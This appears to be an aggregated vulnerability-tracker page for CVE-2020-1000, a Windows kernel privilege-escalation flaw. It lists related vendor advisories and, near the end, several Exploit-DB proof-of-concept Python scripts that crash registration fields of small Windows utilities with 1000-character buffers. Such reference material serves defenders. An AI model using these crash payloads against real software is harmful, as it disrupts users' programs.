CVE-2020-1000
published 2020-04-15CVE-2020-1000: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege…
PriorityP337high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
EPSS
0.93%
56.6th percentile
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1003, CVE-2020-1027.
Affected
69 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | storefront | — | — |
| chrome_chrome | — | — | |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_cisco9.8CRITICAL
vendor_msrc7.8HIGH
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
argo-cd: Bypassing Rate Limit and Brute Force Protection Using Cache Overflow
vendor_redhat·2024-03-18·CVSS 7.5
CVE-2024-21662 [HIGH] CWE-307 argo-cd: Bypassing Rate Limit and Brute Force Protection Using Cache Overflow
argo-cd: Bypassing Rate Limit and Brute Force Protection Using Cache Overflow
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Prior to versions 2.8.13, 2.9.9, and 2.10.4, an attacker can effectively bypass the rate limit and brute force protections by exploiting the application's weak cache-based mechanism. This loophole in security can be combined with other vulnerabilities to attack the default admin account. This flaw undermines a patch for CVE-2020-8827 intended to protect against brute-force attacks. The application's brute force protection relies on a cache mechanism that tracks login attempts for each user. This cache is limited to a `defaultMaxCacheSize` of 1000 entries. An attacker can overflow this cache by bombarding it with login attempts for differen
Chrome
Stable Channel Update for Desktop: CVE-2021-21182
vendor_chrome·2021-03-02·CVSS 6.5
CVE-2021-21182 [LOW] Stable Channel Update for Desktop: CVE-2021-21182
Stable Channel Update for Desktop
CVE-2021-21182: Insufficient policy enforcement in navigations. Reported by Luan Herrera (@lbherrera_) on 2020-02-05 [$1000][ 1105875 ] Low CVE-2021-21183: Inappropriate implementation in performance APIs
Reported by Takashi Yoneuchi (@y0n3uchy) on 2020-07-15 [$1000][ 1131929 ] Low CVE-2021-21184: Inappropriate implementation in performance APIs
Severity: low
Chrome
Stable Channel Update for Desktop: CVE-2021-21171
vendor_chrome·2021-03-02·CVSS 6.5
CVE-2021-21171 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-21171
Stable Channel Update for Desktop
CVE-2021-21171: Incorrect security UI in TabStrip and Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25 [$1000][ 1150810 ] Medium CVE-2021-21172: Insufficient policy enforcement in File System API
Reported by Maciej Pulikowski on 2020-11-19 [$500][ 1154250 ] Medium CVE-2021-21173: Side-channel information leakage in Network Internals
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2021-21152
vendor_chrome·2021-02-16·CVSS 8.8
CVE-2021-21152 [HIGH] Stable Channel Update for Desktop: CVE-2021-21152
Stable Channel Update for Desktop
CVE-2021-21152: Heap buffer overflow in Media. Reported by Anonymous on 2021-01-14 [$1000][ 1155974 ] High CVE-2021-21153: Stack overflow in GPU Process
Reported by Jan Ruge of ERNW GmbH on 2020-12-06 [$TBD][ 1173269 ] High CVE-2021-21154: Heap buffer overflow in Tab Strip
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2021-21128
vendor_chrome·2021-01-19·CVSS 8.8
CVE-2021-21128 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-21128
Stable Channel Update for Desktop
CVE-2021-21128: Heap buffer overflow in Blink. Reported by Liang Dong on 2020-10-15 [$1000][ 1140403 ] Medium CVE-2021-21129: Insufficient policy enforcement in File System API
Reported by Maciej Pulikowski on 2020-10-20 [$1000][ 1140410 ] Medium CVE-2021-21130: Insufficient policy enforcement in File System API
Severity: medium
Cisco
Cisco Firepower 1000 Series Bleichenbacher Attack Vulnerability
vendor_cisco·2020-10-21·CVSS 5.3
CVE-2020-3585 [MEDIUM] CWE-203 Cisco Firepower 1000 Series Bleichenbacher Attack Vulnerability
Cisco Firepower 1000 Series Bleichenbacher Attack Vulnerability
A vulnerability in the TLS handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000 Series firewalls could allow an unauthenticated, remote attacker to gain access to sensitive information.
The vulnerability is due to improper implementation of countermeasures against the Bleichenbacher attack for cipher suites that rely on RSA for key exchange. An attacker could exploit this vulnerability by sending crafted TLS messages to the device, which would act as an oracle and allow the attacker to carry out a chosen-ciphertext attack. A successful exploit could allow the attacker to perform cryptanalytic operations that may allow decryption of previously c
Cisco
Cisco IOS Software for Cisco Industrial Routers Virtual-LPWA Unauthorized Access Vulnerability
vendor_cisco·2020-09-24·CVSS 7.5
CVE-2020-3426 [HIGH] CWE-264 Cisco IOS Software for Cisco Industrial Routers Virtual-LPWA Unauthorized Access Vulnerability
Cisco IOS Software for Cisco Industrial Routers Virtual-LPWA Unauthorized Access Vulnerability
A vulnerability in the implementation of the Low Power, Wide Area (LPWA) subsystem of Cisco IOS Software for Cisco 800 Series Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, remote attacker to gain unauthorized read access to sensitive data or cause a denial of service (DoS) condition.
The vulnerability is due to a lack of input and validation checking mechanisms for virtual-LPWA (VLPWA) protocol modem messages. An attacker could exploit this vulnerability by supplying crafted packets to an affected device. A successful exploit could allow the attacker to gain unauthorized read access to sensitive da
Cisco
Cisco IOS XE Software for Cisco ASR 1000 Series 20-Gbps Embedded Services Processor IP ARP Denial of Service Vulnerability
vendor_cisco·2020-09-24·CVSS 7.4
CVE-2020-3508 [HIGH] CWE-400 Cisco IOS XE Software for Cisco ASR 1000 Series 20-Gbps Embedded Services Processor IP ARP Denial of Service Vulnerability
Cisco IOS XE Software for Cisco ASR 1000 Series 20-Gbps Embedded Services Processor IP ARP Denial of Service Vulnerability
A vulnerability in the IP Address Resolution Protocol (ARP) feature of Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers with a 20-Gbps Embedded Services Processor (ESP) installed could allow an unauthenticated, adjacent attacker to cause an affected device to reload, resulting in a denial of service condition.
The vulnerability is due to insufficient error handling when an affected device has reached platform limitations. An attacker could exploit this vulnerability by sending a malicious series of IP ARP messages to an affected device. A successful exploit could allow the attacker to exhaust system resources, which would eventually cause
Citrix
CVE-2020-8200: Improper authentication in Citrix StoreFront Server < 1912.0.1000 allows an attacker who is authenticated on the same Microsoft Active Directory domai
vendor_citrix·2020-09-18·CVSS 6.5
CVE-2020-8200 [MEDIUM] CWE-287 CVE-2020-8200: Improper authentication in Citrix StoreFront Server < 1912.0.1000 allows an attacker who is authenticated on the same Microsoft Active Directory domai
CVE-2020-8200: Improper authentication in Citrix StoreFront Server < 1912.0.1000 allows an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.
Chrome
Stable Channel Update for Desktop: CVE-2020-6561
vendor_chrome·2020-08-25·CVSS 6.5
CVE-2020-6561 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6561
Stable Channel Update for Desktop
CVE-2020-6561: Inappropriate implementation in Content Security Policy. Reported by Rob Wu on 2019-02-16 [$1000][ 1086845 ] Medium CVE-2020-6562: Insufficient policy enforcement in Blink
Reported by Masato Kinugawa on 2020-05-27 [$1000][ 1104628 ] Medium CVE-2020-6563: Insufficient policy enforcement in intent handling
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6554
vendor_chrome·2020-08-10·CVSS 8.6
CVE-2020-6554 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6554
Stable Channel Update for Desktop
CVE-2020-6554: Use after free in extensions. Reported by Anonymous on 2020-06-12
[$1000][ 1105202 ] Medium CVE-2020-6555: Out of bounds read in WebGL
Reported by Marcin Towalski of Cisco Talos on 2020-07-13
Severity: medium
Cisco
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Static Credentials Vulnerability
vendor_cisco·2020-06-03·CVSS 8.8
CVE-2020-3234 [HIGH] CWE-798 Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Static Credentials Vulnerability
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Static Credentials Vulnerability
A vulnerability in the virtual console authentication of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an authenticated but low-privileged, local attacker to log in to the Virtual Device Server (VDS) of an affected device by using a set of default credentials.
The vulnerability is due to the presence of weak, hard-coded credentials. An attacker could exploit this vulnerability by authenticating to the targeted device and then connecting to VDS through the device’s virtual console by using the static credentials. A successful exploit could allow the attacker to access th
Cisco
Cisco IOS Software for Cisco Industrial Routers Arbitrary Code Execution Vulnerabilities
vendor_cisco·2020-06-03·CVSS 9.8
CVE-2020-3198 [CRITICAL] CWE-119 Cisco IOS Software for Cisco Industrial Routers Arbitrary Code Execution Vulnerabilities
Cisco IOS Software for Cisco Industrial Routers Arbitrary Code Execution Vulnerabilities
Multiple vulnerabilities in Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, remote attacker or an authenticated, local attacker to execute arbitrary code on an affected system or cause an affected system to crash and reload.
For more information about these vulnerabilities, see the Details section of this advisory.
Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
This advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdv
Cisco
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Inter-VM Channel Command Injection Vulnerability
vendor_cisco·2020-06-03·CVSS 8.8
CVE-2020-3205 [HIGH] CWE-20 Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Inter-VM Channel Command Injection Vulnerability
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Inter-VM Channel Command Injection Vulnerability
A vulnerability in the implementation of the inter-VM channel of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, adjacent attacker to execute arbitrary shell commands on the Virtual Device Server (VDS) of an affected device.
The vulnerability is due to insufficient validation of signaling packets that are destined to VDS. An attacker could exploit this vulnerability by sending malicious packets to an affected device. A successful exploit could allow the attacker to execute arbitrary commands in the context of the Linux shell of VDS with
Cisco
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server CLI Command Injection Vulnerability
vendor_cisco·2020-06-03·CVSS 6.7
CVE-2020-3210 [MEDIUM] CWE-77 Cisco IOS Software for Cisco Industrial Routers Virtual Device Server CLI Command Injection Vulnerability
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server CLI Command Injection Vulnerability
A vulnerability in the CLI parsers of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an authenticated, local attacker to execute arbitrary shell commands on the Virtual Device Server (VDS) of an affected device. The attacker must have valid user credentials at privilege level 15.
The vulnerability is due to insufficient validation of arguments that are passed to specific VDS-related CLI commands. An attacker could exploit this vulnerability by authenticating to the targeted device and including malicious input as the argument of an affected command. A successful explo
Cisco
Cisco IOx Application Environment for IOS Software for Cisco Industrial Routers Vulnerabilities
vendor_cisco·2020-06-03·CVSS 8.1
CVE-2020-3199 [HIGH] CWE-20 Cisco IOx Application Environment for IOS Software for Cisco Industrial Routers Vulnerabilities
Cisco IOx Application Environment for IOS Software for Cisco Industrial Routers Vulnerabilities
Multiple vulnerabilities in the Cisco IOx application environment of Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) that are running Cisco IOS Software could allow an attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges on an affected device.
For more information about these vulnerabilities, see the Details section of this advisory.
Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/co
Microsoft
Windows Kernel Elevation of Privilege Vulnerability
vendor_msrc·2020-04-14·CVSS 7.8
CVE-2020-1000 [HIGH] Windows Kernel Elevation of Privilege Vulnerability
Windows Kernel Elevation of Privilege Vulnerability
Description: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.
The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.
Windows Kernel: Windows Kernel
Issuing CNA: Microsoft
Impact: Elevation of Privilege
Exploit Status: Publicly Dis
Chrome
Stable Channel Update for Desktop: CVE-2020-6431
vendor_chrome·2020-04-07·CVSS 4.3
CVE-2020-6431 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6431
Stable Channel Update for Desktop
CVE-2020-6431: Insufficient policy enforcement in full screen. Reported by Luan Herrera (@lbherrera_) on 2018-06-14
[$1000][ 965611 ] Medium CVE-2020-6432: Insufficient policy enforcement in navigations
Reported by David Erceg on 2019-05-21
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-19923
vendor_chrome·2020-02-04·CVSS 7.5
CVE-2019-19923 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-19923
Stable Channel Update for Desktop
CVE-2019-19923: Out of bounds memory access in SQLite. Reported by Richard Lorenz, SAP on 2020-01-16
[$1000][ 1026546 ] Low CVE-2020-6408: Insufficient policy enforcement in CORS
Reported by Zhong Zhaochen of andsecurity
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6500
vendor_chrome·2020-02-04·CVSS 6.5
CVE-2020-6500 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6500
Stable Channel Update for Desktop
CVE-2020-6500: Inappropriate implementation in interstitials. Reported by evi1m0 of Bilibili Security Team on 2018-05-15
[$1000][ 1038036 ] Medium CVE-2020-6400: Inappropriate implementation in CORS
Reported by Takashi Yoneuchi (@y0n3uchy) on 2019-12-27
Severity: medium
Cisco
Cisco Firepower 1000 Series SSL/TLS Denial of Service Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3283 Cisco Firepower 1000 Series SSL/TLS Denial of Service Vulnerability
CVE-2020-3283: Cisco Firepower 1000 Series SSL/TLS Denial of Service Vulnerability
A vulnerability in the Secure Sockets Layer (SSL)/Transport Layer Security (TLS) handler of Cisco Firepower Threat Defense (FTD) Software when running on the Cisco Firepower 1000 Series platform could allow an unauthenticated, remote attacker to trigger a denial of service (DoS) condition on an affected device. The vulnerability is due to a communication error between internal functions. An attacker could exploit this vulnerability by sending a crafted SSL/TLS message to an affected device. A successful exploit could allow the attacker to cause a buffer underrun, which leads to a crash. The crash causes the affected device to reload. Cisco has released software updates that address the vulnerability describe
Cisco
Cisco IOS Software for Cisco Industrial Routers Arbitrary Code Execution Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2020-3198 Cisco IOS Software for Cisco Industrial Routers Arbitrary Code Execution Vulnerabilities
CVE-2020-3198: Cisco IOS Software for Cisco Industrial Routers Arbitrary Code Execution Vulnerabilities
Multiple vulnerabilities in Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, remote attacker or an authenticated, local attacker to execute arbitrary code on an affected system or cause an affected system to crash and reload. For more information about these vulnerabilities, see the
CVSS: 3.0
CWE: CWE-119, CWE-119
Bug IDs: CSCvr12083, CSCvr46885, CSCvr12083, CSCvr46885
Cisco
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software for Firepower 1000/2100 Series Appliances Secure Boot Bypass Vulnerabilities
vendor_cisco·CVSS 3.0
CVE-2020-3458 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software for Firepower 1000/2100 Series Appliances Secure Boot Bypass Vulnerabilities
CVE-2020-3458: Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software for Firepower 1000/2100 Series Appliances Secure Boot Bypass Vulnerabilities
Update from October 23, 2020: Cisco has become aware of a new Cisco Adaptive Security Appliance vulnerability that could affect the fixed releases recommended for code trains 9.13 and 9.14 in the Fixed Software section of this advisory. See the Cisco Adaptive Security Appliance Software SSL/TLS Denial of Service Vulnerability for additional information. Multiple vulnerabilities in the secure boot process of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software for the Firepower 1000 Series and Firepower 2100 Series Appliances could allow an authenticated, local attacker to bypass t
Cisco
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Static Credentials Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3234 Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Static Credentials Vulnerability
CVE-2020-3234: Cisco IOS Software for Cisco Industrial Routers Virtual Device Server Static Credentials Vulnerability
A vulnerability in the virtual console authentication of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an authenticated but low-privileged, local attacker to log in to the Virtual Device Server (VDS) of an affected device by using a set of default credentials. The vulnerability is due to the presence of weak, hard-coded credentials. An attacker could exploit this vulnerability by authenticating to the targeted device and then connecting to VDS through the device’s virtual console by using the static credentials. A successful exploit could allow the attacker
Cisco
Cisco IOS Software for Cisco Industrial Routers Virtual Device Server CLI Command Injection Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3210 Cisco IOS Software for Cisco Industrial Routers Virtual Device Server CLI Command Injection Vulnerability
CVE-2020-3210: Cisco IOS Software for Cisco Industrial Routers Virtual Device Server CLI Command Injection Vulnerability
A vulnerability in the CLI parsers of Cisco IOS Software for Cisco 809 and 829 Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an authenticated, local attacker to execute arbitrary shell commands on the Virtual Device Server (VDS) of an affected device. The attacker must have valid user credentials at privilege level 15. The vulnerability is due to insufficient validation of arguments that are passed to specific VDS-related CLI commands. An attacker could exploit this vulnerability by authenticating to the targeted device and including malicious input as the argument of an affected command. A suc
Cisco
Cisco IOS XE Software for Cisco ASR 1000 Series 20-Gbps Embedded Services Processor IP ARP Denial of Service Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3508 Cisco IOS XE Software for Cisco ASR 1000 Series 20-Gbps Embedded Services Processor IP ARP Denial of Service Vulnerability
CVE-2020-3508: Cisco IOS XE Software for Cisco ASR 1000 Series 20-Gbps Embedded Services Processor IP ARP Denial of Service Vulnerability
A vulnerability in the IP Address Resolution Protocol (ARP) feature of Cisco IOS XE Software for Cisco ASR 1000 Series Aggregation Services Routers with a 20-Gbps Embedded Services Processor (ESP) installed could allow an unauthenticated, adjacent attacker to cause an affected device to reload, resulting in a denial of service condition. The vulnerability is due to insufficient error handling when an affected device has reached platform limitations. An attacker could exploit this vulnerability by sending a malicious series of IP ARP messages to an affected device. A successful exploit could allow the attacker to exhaust system resources, which would even
GHSA
GHSA-824c-87gg-824v: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Pr
ghsa_unreviewed·2022-05-24·CVSS 7.8
CVE-2020-0913 [HIGH] CWE-269 GHSA-824c-87gg-824v: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Pr
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1000, CVE-2020-1003, CVE-2020-1027.
GHSA
GHSA-jmx9-mphw-fm82: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Pr
ghsa_unreviewed·2022-05-24·CVSS 7.8
CVE-2020-1003 [HIGH] CWE-269 GHSA-jmx9-mphw-fm82: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Pr
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1027.
GHSA
GHSA-4425-fxh6-87fr: An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privileg
ghsa_unreviewed·2022-05-24·CVSS 7.8
CVE-2020-1027 [HIGH] CWE-269 GHSA-4425-fxh6-87fr: An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privileg
An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1003.
GHSA
GHSA-hjqq-v5qj-gf74: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Pr
ghsa_unreviewed·2022-05-24·CVSS 7.8
CVE-2020-1000 [HIGH] CWE-269 GHSA-hjqq-v5qj-gf74: An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Pr
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1003, CVE-2020-1027.
No detection rules found.
Exploit-DB
SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
exploitdb·2020-02-25
SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
---
# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/spotftp.html
# Version: 2.4.8
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program SpotFTP-FTP Password Recover
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "RandomLetter.txt"
# Click in the Enter Registration Code
# In the field Key put the content of the file "RandomLetter.txt"
# End :)
buffer = 'Z' * 1000
try:
file = open("RandomLetter.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
Exploit-DB
Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
exploitdb·2020-01-13
Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
---
# Exploit Title: Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.Backup Key Recovery Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
pri
Exploit-DB
TaskCanvas 1.4.0 - 'Registration' Denial Of Service
exploitdb·2020-01-13
TaskCanvas 1.4.0 - 'Registration' Denial Of Service
TaskCanvas 1.4.0 - 'Registration' Denial Of Service
---
# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : https://www.digitalvolcano.co.uk/
# Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install TaskCanvas
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Registration -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Registration' and click on 'Ok'
6.TaskCanvas Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creatin
Exploit-DB
SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
exploitdb·2020-01-13
SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
---
# Exploit Title: SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install SpotDialup
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotDialup Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload."
Exploit-DB
RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
exploitdb·2020-01-06
RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
---
# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install RemShutdown
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.RemShutdown Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil
Exploit-DB
SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
exploitdb·2020-01-06
SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
---
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install SpotFTP
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotFTP Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Cr
Exploit-DB
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
exploitdb·2020-01-06
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
---
# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install BlueAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.BlueAuditor Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil
Exploit-DB
SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
exploitdb·2020-01-06
SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
---
# Exploit Title: SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotdialup_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install SpotDialup
